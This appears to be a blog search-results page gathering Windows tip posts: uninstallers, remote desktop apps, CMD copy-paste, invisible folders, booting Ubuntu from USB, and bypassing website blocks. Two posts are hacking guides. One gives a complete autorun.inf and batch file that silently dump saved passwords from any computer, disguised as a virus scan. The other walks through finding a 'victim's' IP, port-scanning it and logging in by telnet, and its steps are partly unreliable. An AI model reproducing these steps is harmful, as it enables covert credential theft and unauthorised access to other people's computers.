Showing posts sorted by relevance for query windows. Sort by date Show all posts
Showing posts sorted by relevance for query windows. Sort by date Show all posts

Saturday 5 March 2016

UNINSTALL PROGRAMS EASILY WITH THESE THIRD-PARTY UNINSTALLERS

Leave a Comment




In Windows One Can not Just Click on “Delete” to Uninstall a program in Windows, you have to run the Software Uninstaller or you Can do it with Control Panel. Many times People Find it Difficult to uninstall a Specific program. You might not be aware of the Fact that Uninstalling Programs through Control panel does not always uninstall it Completely. Traces are still left in Registry and Program Files folder.
To Overcome this Problem and Uninstall Programs once and for all, you need to use third-party Uninstallers. I will Mention 3 best Uninstallers which will help you to uninstall any program completely and easily including the registry entries. These uninstallers also come with additional features such as Batch Uninstall, Program Sorting which makes them much easier to use.

3 THIRD-PARTY UNINSTALLERS TO UNINSTALL PROGRAMS IN WINDOWS


1) Iobit Uninstaller 3: Iobit Uninstaller is my Preferred Program to Uninstall Applications from my PC without keeping any Leftovers. Iobit uninstaller 3 is Free to use and  Comes with beautiful and user-Friendly Interface, Big advantage of Iobit Uninstaller 3 is the fact that it is Portable and Light. which means you don’t need to Install this Program and can Carry it anywhere you want.
Iobit uninstaller 3 Also Creates System Restore Point for you, It shows you the list of programs that have been installed on your Windows so that you Can easily Uninstall them, or Can even Batch Uninstall Programs to Speedup the Process.

2) Comodo Program Manager: Comodo Program manager is another Program to Uninstall Programs from Windows Easily. Besides Uninstalling Programs, Comodo Program Manager Comes with Many more Useful Features. It is Simple to use as it comes with User-friendly interface. this Program also helps you to remove Drivers, services and Windows Updates.
Comodo Program Manager Is always Active and running in the Background, So whenever you try to run a setup, it checks for Malwares using their Cloud Technology. The only Disadvantage I Find with this Program is it may use a Fair amount of your Computer resource as it is always Actively running in Background.

3) Revo Uninstaller: Revo Uninstaller is one of the Popular Third-Party software that is used by many to Uninstall Programs. Revo uninstaller is Fast and reliable, you can uninstall single and multiple Programs easily and fast.
It is not available to download for Free from their official site but you can enjoy all the features by downloading 30 days free trial pack. You may think of Purchasing if none of the above two programs Interests you Which are Free and much Better. 

Read More

Sunday 6 March 2016

TRICK TO ACCESS A WINDOWS DESKTOP FROM YOUR SMARTPHONE OR TABLET

Leave a Comment

Yes, you can Access a Windows Desktop from Your Smartphone or Tablet. IPads and android tablets or smartphones can’t run windows app locally, but with this, you can remote your Windows desktop, even with a physical keyboard. Many apps have been developed and launched like Microsoft remote desktop appTeamViewer for Remote Control, among which Microsoft app is mostly used for professional use while the other app can also be used for personal uses.



MICROSOFT’S REMOTE DESKTOP APP 


This app has reduced the workload from one’s head of staying in the home and working all day and canceling the vacations and many more just because the work info is available on your PC. With Microsoft remote desktop app, you can connect to your work resources and remote PC from anywhere you feel like working. This app is mostly used for business and professional use rather than personal use.

Features of this app :
  • Access your desktop with your phones easily.
  • Rich multi-touch experience with the remote desktop protocol (RDP).
  • It has an outstanding feature or technology, namely Network Layer Authentication which secure connection to your data and applications.
  • High-quality video and sound streaming.
Review for this app: This app is friendly for business-related persons or for professional use but not so friendly for personal use.

TEAMVIEWER FOR REMOTE CONTROL


This app is friendly for personal use too no matter wherever you are, rather than controlling your own computer you can also remotely troubleshoot your relative's PC.
Features : 
  • Access to computers (Windows, Mac, Linux) is possible also during a telephone call.
  • Transfer the files from your PC to the phone or from the phone to the PC.
  • Automatic quality adjustment.
  • Remotely reboot the computer.
  • TeamViewer free is for private use only e.g. to access or solve your or your friend's computer problems.
All you have to do is Download an Install Teamviewer on Your Desktop and Mobile, after installing on your smartphone you will have to log in with the details that TeamViewer window displays.


Other Options: Other than these two apps you surely have other options too if you are not friendly with both of them.
Splashtop: This is another popular remote desktop app that people reportedly has said that it is faster. But unfortunately, this is not a free app as it may cost you around $20 at a regular price. And to use it over the internet you need to buy an additional “Anywhere access pack”. This app can be used or purchased if you don’t mind spending money or if you need a faster app to complete your work fast.

Conclusion: With the development of these apps both personal and professional works are carried out easily and in a better manner with easy access.
Read More

Saturday 7 May 2016

How to Hack Passwords Using a USB Drive

Leave a Comment


As we all know, Windows stores most of the passwords which are used daily, including instant messenger passwords such as MSN, Yahoo, AOL, Windows Messenger, etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exist many tools for recovering these passwords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail) if you use the associated programs of these accounts.
IE Pass viewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet Explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more.
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:
Record Index, Web Site, User Name, Password, User Name Field and Password Field.

Preparing Your USB Drive for Password Hacking:

Here is a step by step procedure to create the password hacking toolkit:
You must temporarily disable your antivirus before following these steps.
  1. Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.
    ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe andpasswordfox.exe into your USB Drive.
  2. Create a new Notepad and write the following text into it:
    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan
    save the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen-drive.
  3. Create another Notepad and write the following text onto it:
    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start passwordfox.exe /stext passwordfox.txt
    
    Save the Notepad and rename it from New Text Document.txt to launch.bat.Copy the launch.bat file to your USB drive.
    Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on any computer to sniff the stored passwords. Just follow these steps:
    1. Insert the pen-drive and the autorun window will pop-up. (This is because we have created an auto-run pen-drive).
    2. In the pop-up window, select the first option (Perform a Virus Scan).
    3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the.TXT files.
    4. Remove the pen-drive and you’ll see the stored passwords in the.txt files.
This hack works on Windows 2000, XP, Vista and 7.
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
Read More

Saturday 5 March 2016

HOW TO ENABLE COPY PASTE IN CMD – WINDOWS

Leave a Comment



By default, Windows does not allow users to Copy text and Paste it in Command prompt Or Copy text from Command prompt and paste it elsewhere. But there is an option in CMD itself to enable Copy & Paste Text in Windows Command Prompt.
Today in this tutorial we will learn how to Enable Copying and Pasting Texts in the Windows Command prompt. One of the main advantages of this will be that you can copy any command that you find on the internet or from any word/excel file and paste it directly in CMD and execute that command just like that.

Step 1: Open CMD, Just type CMD in search or Press Win + X key to select Command Prompt.
Step 2: Right-click on the Title of the CMD window and Select Properties just like its shown in the below Picture

Enable Copy paste in CMD


Step 3: You will see a Pop-up Window coming up, Now on the Right-hand side, Under Edit Options, Just Check Quick Edit Mode and click OK
Step 4: Everything is Done, Now just Copy any Text from Here or Anywhere else Using CTRL + C keys and just Right-click using your mouse on CMD. You will see that the text is been pasted automatically in CMD. Please Understand that Using CTRL + C to Copy text is Important.
Likewise, if you wish to Copy Text from CMD to paste elsewhere then Just Select the Text in CMD and Again just Right Click with the mouse. Your Text is Copied and ready to Paste it in any Document you want.
This Doesn’t Limit you to just Text you can even copy File or Folder path and paste it in CMD. Everything that you have to type manually can be copied from somewhere and pasted directly to CMD with this small Tweak
So this was just a small Tip I wanted to share with my Readers so that you don’t have to Type any long Command in CMD which if typed incorrectly can cause errors. I hope this will help some Of you.
Read More

Tuesday 30 August 2016

How to Unblock Websites at School, Work, Home or Anywhere

11 comments

Internet censorship has grown drastically over the past few years with countries like China, Pakistan, Saudi Arabia, Iran taking the lead over others in blocking sources of free unbiased information. China is known to have even forced Google to filter its search results. Government censorship is not the only reason why websites are blocked. Some network administrators also prevent users from accessing certain websites which they believe are of no use in places such as schools and sometimes, even offices. In such times, you may need to access a website that is blocked. This article explains how.

Which websites are most commonly Blocked?
Unblock website's most commonly blocked websites include websites about pop culture, health, medicine, women, religion, and politics. Social websites are also often blocked and include the likes of Facebook, Twitter, YouTube, Quora!, Pinterest, Instagram, MySpace, Reddit, Digg, Hulu, LinkedIn, Tumblr, Blogger (Blogspot), Bebo, Flickr, Yahoo! Messenger, Typepad, Technorati, StumbleUpon and Delicious. Sites like Google News, Wikipedia, Wikileaks, and eBay! are also blocked at certain places.
Access Blocked Websites at School, Work or Anywhere

There are many genuine reasons for which you might want to visit blocked websites at your school or office. Given below are the ways you can use to regain access to the blocked website you wish to visit. 

1. Cache method: Most search engines maintain a cache of web pages indexed by them. You can search for a website on Google, Yahoo! or Bing and click on the cached link that is given next to the result. To load the web pages more quickly, you can visit the text-only version. Since the website is provided from the search engine's servers, it can be used to overcome IP address and URL based filtering.


2. Using Google Web Light: For users browsing on a slow mobile internet connection, Google Web Light removes all CSS styling and JavaScript to present a stripped-down version of the web page from Google's own servers. As the content is provided from Google's servers, the blocking software feels that you are visiting Google, whereas, in reality, you are viewing the blocked website. Go to Google Web Light. To visit the website of your choice, just replace top.com in the URL with the address of the website. Despite being designed for mobile devices with a slow internet connection, Google Web Light can be accessed from your computer as well.

3. Access blocked websites with Google Translate. You can use translation service from Google to visit blocked websites. To do so, enter a language different from the website's language in the 'From' field and English in the "To" field. You can also use this method to bypass software that blocks websites based on specific keyword mentions. Just translate the URL you wish to visit in a different language to overcome the keyword block.


4. Create a 2 layered unblocker: Go to Google Translate, open any proxy website inside it and then use that proxy website to access your blocked website. In this way, you can achieve a two-layered website unblocking.

5. Use RSS Readers for accessing restricted blogs: All blogs syndicate their content via RSS feeds which you can subscribe to in web-based RSS readers like Feedly to access blocked content. For example, the RSS feed of this blog is located at http://feeds.@

6. To access a blocked website, you can enter its IP address instead of the URL in your browser's address bar. This can bypass the most basic forms of website blocks. Although if the blocking software maps the IP address to the website domain, the website will still remain blocked. You can find the IP address of any website by pinging the website domain name in the Command Prompt in Windows (Terminal in other operating systems) and noting its IP address. Execute ping top-trick-for-pc.blogspot.com in the Command Prompt to ping top-trick-for-pc.blogspot.com.


7. Use IP Address to Decimal conversion: If you cannot access your blocked website by entering its IP address, you can enter the decimal equivalent of the URL's IP address to get access to it. Search Google for IP to Decimal + IP Address of the banned website and Google will convert it into decimal. Enter that into your browser's address bar and see if the blocked website opens.

8. Nyud.net: To unblock blocked websites, just add nyud.net to their URL. For example, if this blog (top-trick-for-pc.blogspot.com) is blocked, you can visit it by going to top-trick-for-pc.blogspot.com.

9. Opera Mini Simulator: Opera Mini, the mobile browser for users with a slow internet connection, can be installed on your computer. You can use this PC version to visit blocked websites as Opera Mini accesses content from Opera's servers instead of accessing it from the servers on which the website is hosted. Most websites will load through this method, although the quality of the results obtained may not be that good for JavaScript-heavy websites.


10. TOR: TOR or The Onion Router is free software that protects the privacy and security of its users by channeling data through multiple nodes to prevent the original data from being unscrambled. Although browsing through TOR is a bit slow, it is one of the most effective ways of bypassing restricted websites and protecting your privacy.

11. Proxy websites: There are many proxy websites (anonymizers) that open blocked websites on their servers and present the data to you. This hides the address of the website you are trying to visit from your internet service provider. Few popular free ones include Anonymouse and KProxy.

12. VPN software: VPN or Virtual Private Network software can be described as a tunnel under the public network that offers more anonymity than proxy websites as it also encrypts the data transferred by the blocked website thus, offering complete anonymity. Although most VPN software is available as paid software only, HotSpotShield is a popular free alternative.


13. IP hiding software: Sometimes, websites block users on a particular IP address from visiting themselves. In such cases, free IP hiding software like UltraSurf can be used to visit them. While free software offers very fewer features as compared to paid ones, they are still effective for overcoming the most common blocks.

14. Changing DNS servers: A common way of blocking websites is preventing DNS servers from giving the locations of the blocked website's servers. In such a scenario, changing your DNS servers to those of OpenDNS or Google DNS will be your best option to get over the block. As an additional advantage, this can also increase your internet speed.


15. Edit your host files: Some malware and blocking software edit your host files and add a website's address in them to prevent you from visiting it. In such a scenario, you can edit your host file with Notepad by visiting “C:\WINDOWS\system32\drivers\etc” if C is your system drive. In Windows 10, Windows 8(.1), Windows 7, a warning from UAC might be displayed.

Read More

Thursday 5 October 2017

How To Make A Folder Invisible

Leave a Comment
Make A Folder Invisible



Using this trick You can do two things,

  1. Creating A Folder Without Name.
  2. Making An Invisible Folder.
The Later is derived from the former one.

Creating a folder without a name:


Using this trick You can do two things,

  1. Creating A Folder Without Name.
  2. Making An Invisible Folder.
The Later is derived from the former one.

Creating a folder without a name:

Creating an invisible folder is very simple. Just do the above things and create a folder without name. Then follow the below steps.
  • Right-click the folder and go to Properties.
  • Select the Customize Tab.
  • In the Folder icons section, click the Change Icon button.
  • Move the navbar, you can find empty spaces in between various icons. Select any one empty space among them and press Ok.
  • Now, you will see nothing unless you click that place, where your folder was previously present.
If you have any problem with doing this just leave a comment. I will help you.


This instructable will teach you how to make an invisible folder. You can hide lots of things in it and nobody, but you!

NOTE: This instructable works for Windows 7Vista, and XP. I'm not sure if this works for Windows 2000 and earlier (someone please help me on this.)

Step 1: Getting the Folder


1. right-click on your desktop
2. go to "new"
3. click "folder"

a new folder should pop up...

Step 2: Making It Invisible!!!


1. right-click on the folder
2. click on "properties"
3. click on "customize"
4. click on "change icon"
5. click on a blank space

it should be invisible...

Step 3: Finishing It Up (Optional)


NOTE: this is optional

making the words invisible:

1. go to properties
2. go to the rename box
3. hold ALT and press "0160" in the box (use a number pad)

Now you can hide all the stuff you want to in it!

Step 4: If You Have Vista

I just got vista not too long ago. I also found this annoying bug in vista. My invisible folders won't delete!

Here's what you do:

1. hold "shift" and "right-click" the desktop
2. click "open command window here"
the command prompt should open
3. type in:
ren "(hold alt and press 0160)" temp
4. move the folder into the recycle bin

Read More

Sunday 6 March 2016

REMOVE WRITE PROTECTION IN PENDRIVE AND MEMORY CARD

Leave a Comment


Don’t you just hate it when you buy a Pendrive or a Memory card and there’s nothing you can do to it? Whether it comes with software on it, or you’re just trying to use it for any other purpose, you should have the right to change things up however you like.
In this guide, you will be shown how to Remove Remove write protection in Pendrive and Memory Card. It’s a fairly simple process, so be sure to follow each and every step carefully. This guide is for information purposes and we are not responsible for anything that may happen to your device in the process.
Before we proceed, what is Write protection exactly? Write Protection is when the manufacturer locks the device down from being written on and prevents unauthorized access to add, change or delete the files on the device. While the uses of write protection are a good thing because it prevents files from being tampered with and the manufacturer can make sure all users are getting the same files, but it’s also very inconvenient. To remove this protection, you will need to format the drive.
In this guide, I will show you exactly how to do that. Follow each and every step carefully, please. Windows platform is used for the purpose of this guide.


HOW TO REMOVE REMOVE WRITE PROTECTION IN PENDRIVE?


Step 1: Plugin your pen drive into your USB 2.0 on your computer. To make sure the computer has read your pen drive, you can go down to your bottom left on Windows, you will notice a small USB drive icon. If you click that, it will say “Removable Disk.” This means that the pen drive has been read successfully.  You can take a backup of your files from the pen drive or Memory card Because we here are going to format it Completely.


Step 2: Next we need to open up the command prompt. You can do this by simply going to “Start”, then just search for “Command Prompt”, or you can simply just type in “cmd” and a command prompt should pop up.
Step 3: In the command prompt, type in the drive letter of your pen drive with a colon at the end, like this: “ F: ” but without the quotation marks.
Step 4: After putting in the previous command, type in “format” without the quotation marks. Here’s how to do it: “format F:” and then press “Enter.”
This should get the process started to Remove write protection in Pendrive. Make sure that you are entering the right command with the right drive letter. If you have more than one pen drive plugged in, make sure that you do select the right one as you can accidentally format the wrong drive, causing loss of data.
Step 5: After the process is complete, proceed to the close command prompt.
Read More

Thursday 5 October 2017

How To Boot Ubuntu From A USB Flash Drive

4 comments


 How To Boot Ubuntu From A USB Flash Drive

Below are the three methods, that can be adopted to boot Ubuntu OS from a USB Flash Drive!

Option 1: Boot Ubuntu as a Live CD from a USB Flash Drive

Use this option to install Ubuntu as a Live Install, which allows you to boot from the USB flash drive in Ubuntu, experience the Linux environment but will not retain any changes or settings after you shut down. This is a great way to get a feel for the OS, test some of it's capabilities as well as typical hardware compatibility.

Programs you may need to download:
  1. Ubuntu 10.04 Live CD ISO is available at ubuntu.com.
  2. Universal USB Installer available at pendrivelinux.com.

What you will need:
  1. Computer Running Windows XP/Vista/7.
  2. Fat32 Formatted USB 2.0 Flash Drive, at least 1GB.
  3. PC with a Bios that can boot from USB.

Now with all of the necessary components in place, we can begin to set up our Ubuntu Live USB Drive,
  1. Run the Universal USB Installer by Pendrivelinux.com that you downloaded earlier.
  2. Choose Ubuntu 9.10/10.04.1 Desktop i386.
  3. Select the Ubuntu Live CD that you downloaded earlier.
  4. Choose your Flash Drive.
  5. In this instance, we are going to leave the persistence option unchecked.

This can take anywhere from 15 minutes to 30 minutes depending on the speed of your system. At one point the progress bar will freeze until it is done, and this is the lengthiest wait of the process.

Once complete, you can reboot your computer with the USB flash drive in the USB port, press F12 for the Boot Menu and choose the removable media to boot from and you are in.

As this is a Live USB, any changes you make to the Ubuntu environment will not persist through a reboot. This is because running in this mode, Ubuntu uses available RAM in place of Swap and Hard Disk space. This option also contains the install files needed to install Ubuntu directly to your desktop if you should so desire.


Option 2: Boot Ubuntu as a Live CD with Persistence from a USB Flash Drive

This option will install Ubuntu Linux onto your flash drive with an area for persistent storage. You will be able to restart the computer, boot back into the Linux environment and all settings or changes made previously will persist.

Note: This option is particularly hard on Flash Memory, as there can be quite a bit of reading and writing to the Flash Memory.

What you will need:
  1. Computer Running Windows XP/Vista/7.
  2. Fat32 Formatted USB 2.0 Flash Drive, at least 2GB.
  3. PC with a Bios that can boot from USB.

Now with all of the necessary components in place, we can begin to set up our Ubuntu Live USB Drive,
  1. Run the Universal USB Installer by Pendrivelinux.com that you downloaded earlier.
  2. Choose Ubuntu 9.10/10.04.1 Desktop i386.
  3. Select the Ubuntu Live CD that you downloaded earlier.
  4. Choose your Flash Drive.
  5. Select the Persistence Option of 1GB Casper-RW.

This can take anywhere from 15 minutes to 30 minutes depending on the speed of your system. At one point the progress bar will freeze until it is done, and this is the lengthiest wait of the process.

Once complete, you can reboot your computer with the USB flash drive in the USB port, press F12 for the Boot Menu and choose the removable media to boot from and you are in.

As this is a Live USB with Persistence, any changes you make to the Ubuntu environment will keep through a reboot. This option also contains the install files needed to install Ubuntu directly to your desktop if you should so desire.


Option 3: Install Ubuntu directly to a USB flash drive

This option works by installing Ubuntu to the flash drive like a complete installation. It does not retain the installation files to install on another system. This will allow you to use Ubuntu exactly as if it were installed alone on the hard disk. You can boot from it with any computer that can boot from a USB flash drive.

Note: This method requires that you disable your hard drive in BIOS to prevent overwriting your current operating system and force the install onto the USB drive.

What you will need:
  1. USB 2.0 Flash Drive, at least 4GB.
  2. PC with a BIOS that can boot from USB.
  3. Blank CD.
  4. A Computer with the ability to Burn CD/DVD.

Now with all of the necessary components in place, we can begin the process,
  1. First, you will need to burn your Ubuntu ISO to CD using a program like ImgBurn available at ImgBurn.com.
  2. Boot your computer and press F2 to enter the system BIOS. Within here you will want to disable your Hard Drive. If this is not an option in your BIOS, I would suggest shutting down your computer and unplugging the power and data cables from your hard drive before proceeding. Note: If you choose not to disable your hard drive, you run the risk of installing Ubuntu on top of your current OS and can lose valuable information.
  3. After you have disabled your hard drive, place the Ubuntu Live CD into your computer and boot from this.
  4. At the initial boot screen, choose to try Ubuntu, not install.
  5. Once Ubuntu loads, plug in the desired flash drive into the computer.
  6. Now, double click on the Install Ubuntu icon that appears on the desktop.
  7. The first 3 screens are language, time zone, and keyboard layout.
  8. Now Ubuntu will notify you that there is a disk mounted, and asks to unmount it. This is your flash drive. Give it permission to unmount.
  9. This is the prepare disk space screen. I chose to leave mine at default and let the installer handle the partitions needed by Linux.
  10. Now you will see the login and user information screen.
  11. Now you are ready to install, click install.
  12. At one point during the installation, you may notice a skip button appear on the bottom left. This is to skip the auto-update, and finally the language packs. I chose to skip the language packs update.
  13. This may take a while, mine took about 35 minutes to complete. When it is done, eject the disk and shut down the computer. Plug your hard drive back in if necessary, or boot your computer into bios and re-enable it. Reboot your computer and press F12 to enter the boot menu, choose the flash drive and boot into Ubuntu.
Read More

Sunday 8 May 2016

How to Hack Any Computer | Pc | Laptop by IP Address ( Easy Steps Tutorial )

Leave a Comment


Here we post method to hack any computer or pc by their IP address. For getting the IP address of the victim’s computer we also post how to get the victim’s IP address online. By IP address, you can access their full computer system, their all files and folders, photos, videos and any other files stored in their hard disk by our little and easy tutorials. You can check more tutorials

Many times we need urgently to hack the computer system of our friends or relatives for some fun. So here is the full method of how to get their IP and using this IP how to hack their computer system or check more hacking tricks


Requirements to hack computer

  1. First of all fresh mind
  2. Victim’s Ip Address ( Method is posted below )
  3. Some software ( Download links available )
  4. Internet requires

How to get the IP address of any computer


These are very tough steps to get the IP of a victim’s computer. Because by getting the IP address we can hack their system in minutes. Here we posted social media chatting method to get their IP ( Facebook)

  1. First of All Chat via Facebook to victim’s ( Just send message to them and wait for single reply )
  2. After getting a reply ( Important your friend is online on Facebook )
  3. Open CMD by (Windows+R Then type CMD )
  4. Paste This Command netstat -a ( By this command you see many tips)
  5. Note all the IP address
  6. Then Go to Ip tracer
  7. Check one by one IP address in the map and find correct IP
  8. Done! You get up of your friend's system by chat

How to hack computer by IP address


After getting IP address very steps left for access your friends pc computer system



  • Scan open ports of this IP address which you get above.


  1.  How to scan open ports in the network

Here is all steps to scan open ports in your network


  1. Firstly Download Nmap software for scan ports
  2. Install and open zenmap on windows
  3. Fill target host (which you want to scan)
  4. Select scan type (Intense scan , regular, ping scan, trace rout, udp scan etc.).
  5. Click on scan
  6. Wait till scan is completed.
  7. Thats it, Scanning Done.
  8. If any ports is open you see it

  • It will list you all Opened Ports of the Victim’s PC or computer. (e.g : Port 53 )
  • After getting open ports of IP.
  • Open Cmd and Type this command telnet [IP ADDRESS] [PORT] e.g : telnet 101.23.53.70 53
  • Now you will be asked to Enter Login Information, Just type Username and Password and hit Enter.
    If no password is used just type the Username of their pc or computer
  • Done! You access their pc
Read More